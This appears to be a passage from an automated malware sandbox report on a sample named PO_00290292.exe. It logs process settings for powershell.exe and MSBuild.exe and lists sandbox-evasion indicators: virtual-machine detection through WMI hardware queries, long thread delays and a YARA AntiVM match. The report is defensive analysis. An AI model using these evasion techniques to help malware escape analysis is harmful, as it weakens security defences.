                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599764Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599430Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599091Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598983Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6299Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3099Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6093Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3442Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7818Jump to behavior
                Source: C:\Users\user\Desktop\PO_00290292.exe TID: 5448Thread sleep time: -30500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276Thread sleep count: 6093 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep count: 3442 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -199750s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99641s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99516s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99407s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99282s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99157s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99047s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98938s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98813s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98688s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98563s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98438s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98218s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98107s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99546s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99437s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99218s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -99109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98999s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98780s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98671s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98452s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98343s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98234s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -98112s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -599764s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -599430s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -599312s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -599203s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -599091s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -598983s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -598875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -598766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -598656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -598547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99407Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99282Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99157Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98688Jump to behavior
